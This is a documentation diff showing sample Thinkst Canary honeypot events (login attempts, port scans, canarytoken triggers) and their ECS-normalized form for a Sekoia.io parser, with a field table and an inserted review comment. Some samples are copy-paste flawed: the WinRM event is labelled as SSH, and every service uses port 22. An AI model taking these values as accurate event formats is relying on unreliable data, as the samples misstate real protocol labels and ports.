\"28002\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "action": "insert", + "category": [ + "intrusion_detection" + ], + "code": "28002", + "reason": "Mongo Authentication Attempt", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + 
"address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 22 + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "myuser" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "db": "mydatabase", + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "user": { + "name": "myuser" + } + } + + ``` + + +=== "test_mssql_login_attempt.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"MSSQL Login Attempt\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"HOSTNAME\": \"mssql.example.com\", \"APPNAME\": \"sqlcmd\", \"USERNAME\": \"myuser\", \"PASSWORD\": \"mysecuredpassword\", \"SERVERNAME\": \"1.2.3.4\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"9001\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "9001", + "reason": "MSSQL Login Attempt", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": 
"mssql.example.com", + "domain": "mssql.example.com", + "ip": "5.6.7.8", + "port": 22, + "registered_domain": "example.com", + "subdomain": "mssql", + "top_level_domain": "com" + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "process": { + "name": "sqlcmd" + }, + "related": { + "hosts": [ + "mssql.example.com", + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "myuser" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "user": { + "name": "myuser" + } + } + + ``` + + +=== "test_mysql_login_attempt.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"MYSQL Login Attempt\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"CLIENT_HASH\": \"adc83b19e793491b1c6ea0fd8b46cd9f32e592fc\", \"SALT\": \"18cebe27dc51ad8114db58ef50cf2915c66a1f94\", \"USERNAME\": \"myuser\", \"PASSWORD\": \"mysecuredpassword\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"8001\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": 
"8001", + "reason": "MYSQL Login Attempt", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 22 + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "myuser" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "user": { + "name": "myuser" + } + } + + ``` + + +=== "test_shared_file_opened.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"Shared File Opened\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"USER\": \"jdoe\", \"FILENAME\": \"myimportantfile\", \"AUDITACTION\": \"pread\", \"DOMAIN\": \"EXAMPLE\", \"LOCALNAME\": \"hostname\", \"MODE\": \"domain\", \"OFFSET\": 0, \"REMOTENAME\": \"CANARY\", \"SHARENAME\": \"ImportantStuff\", \"SIZE\": 1800, \"STATUS\": \"OK\", \"SMBARCH\": \"11\", \"SMBVER\": \"1.0.0\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"5000\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", 
\"src_port\": \"53804\"}", + "event": { + "action": "pread", + "category": [ + "intrusion_detection" + ], + "code": "5000", + "reason": "Shared File Opened", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "action": { + "properties": { + "Domain": "EXAMPLE", + "ShareName": "ImportantStuff", + "UserName": "jdoe" + } + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8" + }, + "file": { + "name": "myimportantfile", + "size": 1800 + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "jdoe" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "smbarch": "11", + "smbver": "1.0.0" + }, + "user": { + "name": "jdoe" + } + } + + ``` + + +=== "test_ssh_login_attempt.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"SSH Login Attempt\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"LOCALVERSION\": \"SSH-2.0-MS_1.100\", \"PASSWORD\": \"mypasswordverysecured\", \"REMOTEVERSION\": \"SSH-2.0-libssh2_1.10.1_DEV\", \"USERNAME\": \"jdoe\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"4002\", \"mac_address\": \"\", \"matched_annotations\": 
{}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "4002", + "reason": "SSH Login Attempt", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 22 + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "jdoe" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "user": { + "name": "jdoe" + } + } + + ``` + + +=== "test_tftp_request.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"TFTP Request\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"FILENAME\": \"accounting2024.pdf\", \"OPCODE\": \"READ\", \"MODE\": \"netascii\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"10001\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": 
\"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "10001", + "reason": "TFTP Request", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8" + }, + "file": { + "name": "accounting2024.pdf" + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + } + } + + ``` + + +=== "test_winrm_login_attempt.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"SSH Login Attempt\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"WORKSTATION\": \"desktop001\", \"PASSWORD\": \"mypasswordverysecured\", \"DOMAINNAME\": \"EXAMPLE\", \"AUTHTYPE\": \"digest\", \"USERNAME\": \"jdoe\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"4002\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + 
"intrusion_detection" + ], + "code": "4002", + "reason": "SSH Login Attempt", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 22 + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "jdoe" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "user": { + "name": "jdoe" + } + } + + ``` + + + + + +### Extracted Fields + +The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. + +| Name | Type | Description | +| ---- | ---- | ---------------------------| +|`@timestamp` | `date` | Date/time when the event originated. | +|`action.properties.Domain` | `keyword` | | +|`action.properties.ShareName` | `keyword` | | +|`action.properties.UserName` | `keyword` | | +|`destination.domain` | `keyword` | The domain name of the destination. | +|`destination.ip` | `ip` | IP address of the destination. | +|`destination.nat.ip` | `ip` | Destination NAT ip | +|`destination.port` | `long` | Port of the destination. | +|`event.action` | `keyword` | The action captured by the event. | +|`event.category` | `keyword` | Event category. The second categorization field in the hierarchy. | +|`event.code` | `keyword` | Identification code for this event. | +|`event.dataset` | `keyword` | Name of the dataset. | +|`event.kind` | `keyword` | The kind of the event. The highest categorization field in the hierarchy. 
| +|`event.reason` | `keyword` | Reason why this event happened, according to the source | +|`event.start` | `date` | event.start contains the date when the event started or when the activity was first observed. | +|`event.type` | `keyword` | Event type. The third categorization field in the hierarchy. | +|`file.name` | `keyword` | Name of the file including the extension, without the directory. | +|`file.size` | `long` | File size in bytes. | +|`http.request.method` | `keyword` | HTTP request method. | +|`http.response.status_code` | `long` | HTTP response status code. | +|`observer.product` | `keyword` | The product name of the observer. | +|`observer.vendor` | `keyword` | Vendor name of the observer. | +|`process.name` | `keyword` | Process name. | +|`source.domain` | `keyword` | The domain name of the source. | +|`source.geo.city_name` | `keyword` | City name. | +|`source.geo.continent_code` | `keyword` | Continent code. | +|`source.geo.country_iso_code` | `keyword` | Country ISO code. | +|`source.geo.timezone` | `keyword` | Time zone. | +|`source.ip` | `ip` | IP address of the source. | +|`source.port` | `long` | Port of the source. | +|`thinkst_canary.canary_token` | `keyword` | | +|`thinkst_canary.db` | `keyword` | | +|`thinkst_canary.incident_id` | `keyword` | | +|`thinkst_canary.ports` | `keyword` | | +|`thinkst_canary.repo` | `keyword` | | +|`thinkst_canary.smbarch` | `keyword` | | +|`thinkst_canary.smbver` | `keyword` | | +|`tls.established` | `boolean` | Boolean flag indicating if the TLS negotiation was successful and transitioned to an encrypted tunnel. | +|`url.original` | `wildcard` | Unmodified original url as seen in the event source. | +|`url.path` | `wildcard` | Path of the request, such as "/search". | +|`user.domain` | `keyword` | Name of the directory the user is a member of. | +|`user.name` | `keyword` | Short name or login of the user. | +|`user_agent.original` | `keyword` | Unparsed user_agent string. 
| + + + +For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/ThinkstCanary/thinkst-canary). \ No newline at end of file diff --git a/_shared_content/operations_center/integrations/generated/89346697-b64b-45d4-a456-72fd8a2be5d8_sample.md b/_shared_content/operations_center/integrations/generated/89346697-b64b-45d4-a456-72fd8a2be5d8_sample.md new file mode 100644 index 0000000000..3288f3cb0d --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/89346697-b64b-45d4-a456-72fd8a2be5d8_sample.md 
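Review bot: the `test_winrm_login_attempt.json` sample carries `description` "SSH Login Attempt" and `logtype` "4002", the same values as `test_ssh_login_attempt.json`, so the transformed event shows `event.reason: "SSH Login Attempt"` and `event.code: "4002"` for what is labelled a WinRM login; the raw message looks copied from the SSH sample with the WinRM fields (`WORKSTATION`, `DOMAINNAME`, `AUTHTYPE`) added, and it should carry the WinRM description and logtype so readers see how a real WinRM event is normalized. Two smaller points in the same hunk: the Extracted Fields intro has a typo ("infered" should be "inferred"), and the `action.properties.Domain`, `action.properties.ShareName`, `action.properties.UserName` and all `thinkst_canary.*` rows have empty Description cells; a one-line description each (for example "Incident identifier assigned by the Canary console" for `thinkst_canary.incident_id`) would make the table usable for rule writers. Also note that every service sample reuses `dst_port` "22" regardless of protocol (HTTP, LDAP, Mongo, MSSQL, MySQL), so `destination.port` is 22 in all transformed events; realistic per-service ports would make the samples more useful.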
@@ -0,0 +1,795 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "test_consolidated_network_port_scan" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "Consolidated Network Port Scan", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "23": [ + "5.6.7.8" + ], + "80": [ + "5.6.7.8" + ], + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "5007", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_dns_canary_token" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1721315330", + "created_std": "2024-07-18 15:08:50 UTC+0000", + "description": "Canarytoken triggered", + "dst_host": "5.6.7.8", + "dst_port": 53, + "canarytoken": "1111111111111111111111111", + "geoip": { + "city": "Paris", + "continent_code": "EU", + "country": "France", + "country_code": "FR", + "country_code3": "FRA", + "currency_code": "EUR", + "host_domain": "", + "hostname": "", + "ip": "1.2.3.4", + "is_bogon": false, + "is_v4_mapped": false, + "is_v6": false, + "latitude": 48.859077, + "longitude": 2.293486, + 
"region": "Ile-de-France", + "region_code": "J", + "timezone": { + "abbr": "CEST", + "date": "2024-07-18", + "id": "Europe/Paris", + "name": "Central European Summer Time", + "offset": "+02:00", + "time": "17:08:54.722399" + }, + "valid": true + }, + "hostname": "1111111111111111111111111.example.org", + "ip_blocklist": { + "is_proxy": false, + "is_tor": false, + "is_vpn": false + }, + "src_host": "1.2.3.4", + "timestamp": 1721315332, + "timestamp_std": "2024-07-18 15:08:52 UTC+0000", + "type": "dns", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "local_time": "2024-07-18 15:08:50 (UTC)", + "logtype": "16000", + "matched_annotations": {}, + "memo": "Integration dns", + "name": "N/A", + "node_id": "1111111111111111111111111", + "notified": "False", + "src_port": "40296" + } + ``` + + + +=== "test_ftp_login_attempt" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "FTP Login Attempt", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "PASSWORD": "mypasswordverysecured", + "USERNAME": "jdoe", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "2000", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_git_repository_clone_attempt" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", 
+ "description": "Git Repository Clone Attempt", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "HOST": "git.example.org", + "REPO": "mypreviousrepository", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "19001", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_host_port_scan" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "Host Port Scan", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "ports": "23,80,443", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "5002", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_http_api_request" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "HTTP API Request", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "HEADERS": { + "Accept": "*/*", + "Host": "1111111111.example.org", + "User-Agent": "curl/8.7.1" + }, + 
"METHOD": "POST", + "PATH": "/path/to/a/secret/", + "USERAGENT": "curl/8.7.1", + "POSTDATA": {}, + "RESPONSE": 200, + "HOSTNAME": "1111111111.example.org", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "3005", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_http_canary_token" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684212", + "created_std": "2024-07-11 07:50:12 UTC+0000", + "description": "Canarytoken triggered", + "dst_host": "5.6.7.8", + "dst_port": 80, + "canarytoken": "xxxxxxxxxxxxxxxxxxxx", + "geoip": { + "city": "Emerainville", + "continent_code": "EU", + "country": "France", + "country_code": "FR", + "country_code3": "FRA", + "currency_code": "EUR", + "host_domain": "", + "hostname": "", + "ip": "1.2.3.4", + "is_bogon": false, + "is_v4_mapped": false, + "is_v6": false, + "latitude": 48.81276, + "longitude": 2.62139, + "region": "Ile-de-France", + "region_code": "J", + "timezone": { + "abbr": "CEST", + "date": "2024-07-11", + "id": "Europe/Paris", + "name": "Central European Summer Time", + "offset": "+02:00", + "time": "09:50:16.622847" + }, + "valid": true + }, + "headers": { + "Accept": "*/*", + "Host": "1111111111.example.org", + "User-Agent": "curl/8.7.1" + }, + "ip_blocklist": { + "is_proxy": false, + "is_tor": false, + "is_vpn": false + }, + "request_args": {}, + "timestamp": 1720684212, + "timestamp_std": "2024-07-11 07:50:12 UTC+0000", + "type": "http", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "local_time": 
"2024-07-11 07:50:12 (UTC)", + "logtype": "17000", + "matched_annotations": {}, + "memo": "Link to generate alert", + "name": "N/A", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_port": "0" + } + ``` + + + +=== "test_http_login_attempt" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "HTTP Login Attempt", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "METHOD": "GET", + "CHANNEL": "TLS", + "PATH": "/path/to/a/secret/", + "USERAGENT": "curl/8.7.1", + "RESPONSE": 200, + "USERNAME": "jdoe", + "PASSWORD": "mysecuredpassword", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "3001", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_http_page_load" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "HTTP Page Load", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "METHOD": "GET", + "CHANNEL": "TLS", + "PATH": "/path/to/a/secret/", + "USERAGENT": "curl/8.7.1", + "RESPONSE": 200, + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": 
"3000", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_http_proxy_request" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "HTTP Proxy Request", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "URL": "https://example.org/path/to/a/secret/", + "USERAGENT": "curl/8.7.1", + "USERNAME": "jdoe", + "PASSWORD": "mysecuredpassword", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "3001", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_incident" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "incident", + "summary": "Canarytoken triggered", + "timestamp": "1720684212" + } + ``` + + + +=== "test_ldap_bind_attempt" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "LDAP Bind Attempt", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "DN": "uid=john.doe,ou=People,dc=example,dc=com", + "MECH": "GSSAPI", + "VER": "1.0.2", + "REQ": "request", + "TYPE": "PASSWORD", + "PASSWORD": 
